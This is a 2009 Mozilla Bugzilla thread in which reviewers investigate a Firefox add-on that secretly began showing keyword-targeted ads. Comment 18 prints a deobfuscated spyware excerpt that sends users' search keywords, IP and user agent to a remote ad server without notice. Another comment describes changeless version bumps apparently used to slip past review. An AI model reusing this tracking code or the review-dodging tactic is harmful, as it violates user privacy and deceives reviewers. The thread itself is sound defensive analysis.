Last Comment Bug 504050 - Google Reader Notifier is now adware/spyware; shows text ad in status bar derived from recent search keywords; no notice given (this is a recommended add-on)
: Google Reader Notifier is now adware/spyware; shows text ad in status bar der...
Status: RESOLVED FIXED
:
Product: addons.mozilla.org Graveyard
Classification: Graveyard
Component: Policy (show other bugs)
: unspecified
: All All
: -- normal
: ---
Assigned To: Nobody; OK to take it and work on it
:
:
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2009-07-14 02:33 PDT by Peter Gasston
Modified: 2016-02-04 14:51 PST (History)
8 users (show)
See Also:
QA Whiteboard:
Iteration: ---
Points: ---


Attachments
st_ads.js from extension (8.06 KB, application/x-javascript)
2009-07-14 10:49 PDT, Dave Garrett
no flags Details
st_ads.js made readable with line breaks and auto-indentation (12.11 KB, application/x-javascript)
2009-07-14 10:49 PDT, Dave Garrett
no flags Details

Description Peter Gasston 2009-07-14 02:33:37 PDT
User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5

A clickable link appears in the status bar; when clicked, this opens a new tab and sends the user to a new website, via a website called http://c.vioij.com. In my case I saw links to Ebay UK, but other users have reported different results. See this link for screenshots and more details from another user:

http://www.bernzilla.com/2009/07/14/adware-in-my-firefox-status-bar/

Reproducible: Sometimes
Comment 1 Jo Hermans 2009-07-14 02:55:23 PDT
What add-ons do you have loaded ?
Comment 2 Peter Gasston 2009-07-14 03:54:23 PDT
This has happened on two different machines (Linux & Mac); the add-ons they have in common are:

Yahoo! Mail Notifier
Google Reader Notifier
Gmail Manager

Possibly Firebug, although I can't remember off-hand.
Comment 3 Dave Garrett 2009-07-14 07:00:45 PDT
Checking the AMO pages for each, it's Google Reader Notifier. Its deluge of one star reviews has begun.
https://addons.mozilla.org/en-US/firefox/addon/3977

This is an AMO recommended add-on. I think having explicit ads like this should disqualify that. It doesn't even say it's going to do something like this anywhere, so this is a pretty big problem. Moving over to AMO.
Comment 4 Rey Bango 2009-07-14 07:27:18 PDT
Not sure what happened since as of July 8, 2009, the add-on had received good reviews. I'll check it out to see what's up. Advertising itself isn't a reason not to dismiss an add-on for recommended status but if it's intrusive or adware, then it needs to be evaluated.
Comment 5 Jo Hermans 2009-07-14 07:29:54 PDT
It's not advertising itself - it is loading adds. See http://www.bernzilla.com/2009/07/14/adware-in-my-firefox-status-bar/
Comment 6 Rey Bango 2009-07-14 07:33:26 PDT
(In reply to comment #5)
> It's not advertising itself - it is loading adds. See
> http://www.bernzilla.com/2009/07/14/adware-in-my-firefox-status-bar/

Thanks for putting up the post, Jo. That's a big help.

When I said "Advertising itself", I didn't mean that the add-on is advertising it's "self" but that advertising within an add-on is not against AMO policy. If it's becoming intrusive though, then that's where we need to discuss it with the author. I think we're seeing enough complaints where it merits chatting with him.
Comment 7 Dave Garrett 2009-07-14 07:34:57 PDT
I don't use this service or extension and as of yet haven't figured out a way to get it to actually show the ads.

I'm taking a look at the source now and doing some diffs, and wow, I think I just discovered something creatively evil. There were only two changes from version 0.71 to 0.73: the addition of the ad system and the removal of his name from everything. It used to list Rob Warwick as the author in every file and now that's gone along with the listing in about.xul. Either this was sold or he just doesn't want his name to be associated with this. The really sneaky part that I think I just uncovered, is that version 0.73 is listed as experimental and is two versions old. I diffed 0.73 to the next version, 0.74, and then again to the current public version 0.76: the ONLY changes made here are to the version number in the install.rdf. I think they were created explicitly to get past editor review by making the diffs show no changes to the last version when requesting public status for the latest file. That's the only reason I can think of to post changeless versions like this. If it's not, anyone got an idea that makes more sense?
Comment 8 Dave Garrett 2009-07-14 07:43:12 PDT
(In reply to comment #6)
> advertising within an add-on is not against AMO policy.

No, but I do think it should be against AMO policy for recommended add-ons. Mozilla shouldn't be recommending adware.

Also, this is done without even so much as a EULA so it's completely unknown to the user who installs this until it eventually starts showing.
Comment 9 Rey Bango 2009-07-14 07:45:25 PDT
Thanks for vetting this Dave. The way our diff tool works is that it compares the latest submitted update (which is status experimental) against the current public version. So 0.76 would've been compared to 0.71 with out diff tool.
Comment 10 Rey Bango 2009-07-14 07:46:15 PDT
(In reply to comment #8)
> (In reply to comment #6)
> > advertising within an add-on is not against AMO policy.
> 
> No, but I do think it should be against AMO policy for recommended add-ons.
> Mozilla shouldn't be recommending adware.
> 
> Also, this is done without even so much as a EULA so it's completely unknown to
> the user who installs this until it eventually starts showing.

Dave, do you really think I would've recommended an add-on if I thought it was adware? Seriously, give me some credit.
Comment 11 Dave Garrett 2009-07-14 07:50:13 PDT
(In reply to comment #10)
> Dave, do you really think I would've recommended an add-on if I thought it was
> adware? Seriously, give me some credit.

Oh, sorry, I'm not saying that. This was a highly respected add-on for a long time before all this. It just slipped through somehow after the fact. I'm just noting that it is recommended and I don't think any of us would want a recommended adware add-on.
Comment 12 Dave Garrett 2009-07-14 07:52:37 PDT
By the way, I just filed a little bug for the odd choice of homepage and support URLs. (bug 504082) Quite dumb looking to list the current page as the URL for these...
Comment 13 Rey Bango 2009-07-14 08:50:05 PDT
I've emailed the author to find out what's happening. These complaints have only startd occurring in the last 4 days so I want to determine what changed. As Dave mentioned, it's possible that it could be an ownership change or perhaps the author genuinely didn't think this was intrusive. I'll be asking an editor to do a full code review and working towards resolving this quickly.
Comment 14 Dave Garrett 2009-07-14 08:59:49 PDT
Is there any policy on extensions having obfuscated or otherwise not-human-readable code in them? The st_ads.js file is a single line blob of JavaScript with simplistic variable names. Not easy to read even after find/replaces and auto-indentation. Makes trying to figure out what this actually does hard.
Comment 15 Rey Bango 2009-07-14 09:11:05 PDT
@Dave: Yep there is. Obfuscated code is allowed in a final, uploaded version on AMO but the code needs to be reviewed prior to being approved. I'm looking up who reviewed the code so I can discuss this with the editor. I'm doing some homework on my end as well as usually, ad-supported add-ons throw red flags during the review.
Comment 16 Rey Bango 2009-07-14 09:22:26 PDT
I've asked an editor to do a review of the code so hopefully we'll get some answers.
Comment 17 Dave Garrett 2009-07-14 10:04:20 PDT
Also, I thought adding something vaguely useful to the version notes was required? The four versions for this month have nothing.

Ok, this annoyed me so I figured out a little here. First off, there is some sort of grace period before starting to show ads. I figured out how to override it, however. As to what it actually does, it shows targeted advertising based on what search strings it finds in your current URL.

To trigger an ad, do the following:
1) New profile in Firefox 3.5
2) Install Google Reader Notifier 0.76 and restart Firefox
3) Close Google Reader Notifier's options pane and the Add-ons Manager
4) Go to about:config, find "extensions.gbgchanger.start_day" and do right-click->reset
5) Restart Firefox again
6) Go to the home page, which is the default "Firefox Start" Google search, and do a search for "monkey"
7) Your status bar should now have a hyperlink for some ad that is monkey-related.

Note that you can substitute almost any search for Google in step 6. It'll even work on AMO's searches. It just grabs keywords out of a generic search URL with keywords preceded by "q=" and then fetches a list of ads based on it from its server. It doesn't seem to do it every search; it cycles through different items in its list for a while.

At far least they'd need a privacy policy for what they're doing here.
Comment 18 Dave Garrett 2009-07-14 10:41:37 PDT
Since this is without permission forwarding some keywords the user is entering into some searches this does make it spyware. Private user information, namely what they're searching for on the Internet through various sites, is on occasion being sent to their server without permission or notice in order to procure these ads.

The relevant block of code from st_ads.js (made vaguely readable through auto-indenting and whatnot):
    onLocationChange:function(aWebProgress,aRequest,aLocation)
    {
        var J='';
        var D='';
        if(st_ads.P==1)return;
        if(aLocation)
        {
            var url=escape(aLocation.spec);
            if(url!=null)
            {
                var o="";
                var ai=st_ads.A("ListData");
                if(ai.length>0)
                {
                    var nextList=st_ads.A("NextList");
                    if(Date.now()<nextList)
                    {
                        o=ai;
                    }
                }
                if(o.length==0)
                {
                    req=new c("http://f.pnxml.com/");
                    req.add('pid','xgen');
                    req.add('fid','294');
                    req.add('user_ip',st_ads.ag);
                    req.add('user_agent',escape(navigator.userAgent));
                    var T=aLocation.spec.indexOf("q=");
                    if(T== -1)
                    {
                        st_ads.G('','','','','');
                        return;
                    }
                    var ae=aLocation.spec.indexOf('&',T);
                    if(ae== -1)ae=aLocation.spec.length;
                    var keyword=aLocation.spec.substr(T+2,ae-T-2);
                    req.add('keyword',keyword);
                    req.add('referer',escape("http://www.targetedfind.com/product/search/"+keyword));
                    ah=keyword;
                    o=req.execute();
                    st_ads.C("ListData",o);
                    st_ads.C("NextList",Date.now()+st_ads.O*1000);
                }
                var randomnumber=Math.floor(Math.random()*101);
                var use=0;
                if(randomnumber>=60&&randomnumber<85)use=1;
                if(randomnumber>=85)use=2;
                J=st_ads.Q(o,"title",use);
                J=J.replace(/(<([^>]+)>)/ig,"");
                D=st_ads.Q(o,"click_url",use);
                var F=st_ads.Q(o,"description",use).replace(/(<([^>]+)>)/ig,"");
                F=F.replace("&","&amp;
                ");
                var L='';
                var caption=st_ads.Q(o,"display_url",use);
                caption=caption.replace(/(<([^>]+)>)/ig,"");
                st_ads.G(J,D,F,L,caption);
            }
        }
    },

This observer was set to listen on page loads on startup. "req.execute()" does "j()" which generates an XMLHttpRequest for the given parameters.
Comment 19 Dave Garrett 2009-07-14 10:49:14 PDT
Created attachment 388502 [details]
st_ads.js from extension
Comment 20 Dave Garrett 2009-07-14 10:49:39 PDT
Created attachment 388503 [details]
st_ads.js made readable with line breaks and auto-indentation

In case anyone else would care to take a look.
Comment 21 Rey Bango 2009-07-14 10:58:24 PDT
Thanks for outlining the steps Dave. I was able to duplicate the issue as well.
Comment 22 Dave Garrett 2009-07-14 11:11:16 PDT
If anyone would like to take a look at the attached, please do, as I have no idea what some of this crap is doing. It references a non-existent "chrome://gbgchanger/content/message.xul" at one point. After Googling "gbgchanger" I came up with the Google Background Changer which seems to be a Firefox extension to add a wallpaper for Google:
http://www.coolbrowsers.com/Google-Background-Changer.php

I checked in its XPI and it has its own st_ads.js, with normal function names, line breaks, and indentation. It actually has its message.xul which is a popup that says: "You have a special internet search software which gives you additional search results in your status bar. You can turn this on or off at any time. If you would like to turn it off please click here". So it appears that the implementation of all this was taken from somewhere else, modified a bit, obfuscated somewhat, and dumped into here. One of the modifications seems to be the lack of user interaction, which gbgchanger did actually have.
Comment 23 Rey Bango 2009-07-14 11:19:31 PDT
Thanks for doing all of this investigating. After seeing what you've dug plus our testing, we've decided to sandbox the add-on until further notice. There are just too many "what ifs" at the moment. I'll work with the developer to determine their thought process as well as improving the implementation of advertising, if that's the route he wants to take.
Comment 24 Brian King [:kinger] 2009-07-15 09:55:59 PDT
I pretty much agree with Dave's diagnosis here, esp. comments 17, 18 and 22. 

I also agree with it being sandboxed and it should remain that way until the developer replies.
Comment 25 Dave Garrett 2009-07-15 11:39:23 PDT
Thanks. Hopefully the developer will come up with a better solution.

If the developer really does want to do ads I do hope that this method is thrown out the window. Not only are there big privacy issues with this method, but frankly, it's confusing. Does anyone actually believe that even if some users would put up with such a thing that they'd be frequently inclined to click on a tiny 3 word link with no information, even if it was targeted-ish? What's worse, if it actually did work then others will try to do the same thing in their extensions. So if this was allowed, then we end up with the a user installing half a dozen extensions all doing this and fighting over status bar space, and this is all assuming they were bright enough to use new IDs and don't just cause conflicts and errors. It's just not practical.
Comment 26 Dave Garrett 2009-07-24 07:27:13 PDT
Was there ever a reply from the developer? Also, what did the editor say about the initial review?
Comment 27 Rey Bango 2009-07-24 09:58:46 PDT
I'm still working with them on this. I'll update when we have a good resolution.
Comment 28 Dave Garrett 2009-07-24 11:46:05 PDT
Out of curiosity, did you find out if this was done by the original developer or if it was sold to someone else?
Comment 29 Rey Bango 2009-07-24 12:21:17 PDT
Yep. It's still owned by the original developer. They were just exploring monetization ideas.
Comment 30 Fred Wenzel [:wenzel] 2009-08-11 07:13:03 PDT
Rey: Has this been resolved?
Comment 31 Rey Bango 2009-08-11 09:10:01 PDT
No they've not resolved it which is why it remains experimental.
Comment 32 Fred Wenzel [:wenzel] 2009-08-11 09:15:40 PDT
Ah, sorry I overlooked that. You can leave the bug open or close it fixed then, if you like.
Comment 33 Rey Bango 2009-08-11 09:34:58 PDT
I'm going to email the developer one last time. If they're not interested in correcting this, then I'll update the bug and take it from there. Thanks for chekcing in Fred :)
Comment 34 Ben Sizer 2009-10-06 02:22:44 PDT
Is there any prospect of a change to the system here? It was discovered that this was adware/spyware almost 3 months ago but users like myself have had it installed all this time. My ads started showing 2 days ago and a web search eventually led me here. No doubt others are in the same boat? Perhaps one approach would have been to implement a final update that inserted a warning message box somewhere to let us choose to uninstall it.

And aren't updates to recommended extensions on AMO vetted? It's very concerning that I can install an add-one from mozilla.org which later updates to put malign code on my computer. Even just things like him being able to remove the author field from install.rdf is very suspect. That sounds like a problem in the process because there should always be accountability.
Comment 35 Rey Bango 2009-10-06 08:51:02 PDT
@Ben: We review every add-on nomination & update submitted through AMO. In fact, we've done over 6,000 reviews this year surpassing last year's count of ~5,700 reviews. Can something be accidentally overlooked? I would have to say "yes" as our editors are human & it's conceivable that a mistake could occur. Ultimately, though, we do our best to catch these situations.

In this case, it was unfortunately well-hidden and the editorial team has been asked to scrutinize add-on code more closely. 

I'm closing this bug since the add-on has been disabled on AMO but you can still post comments if you'd like or email me at rey@mozilla.com.

Note You need to log in before you can comment on or make changes to this bug.